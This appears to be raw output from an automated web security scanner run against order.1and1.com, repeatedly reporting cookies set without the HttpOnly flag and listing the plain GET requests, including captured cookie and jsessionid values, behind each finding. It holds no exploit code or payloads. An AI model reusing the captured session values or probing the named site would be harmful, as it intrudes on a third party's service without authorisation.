<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=c9c91afabf3b400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/ServerPremium HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=39e0d7fe6aed5c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Service HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=581fa44293975c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1e3836594d69800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TcSpecialOffers HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7ed924d0b7cb6c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TellAFriend HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tellafriend&linkType=txt HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1629a85634893c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3f29a4af086a7400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServerL HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5bfc5160a7724c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServerXL HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=fe6152de8608c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/VirtualServerXXL HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=11df10d3b144d000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=651016b876a97400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/addon HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=21b62dcc6185f000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/costs HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=74df2828c0bde800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/domaincheck HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=77b06e36ce808c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/eshopupselling HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2b1b8234745e6800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupDomainPrices HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
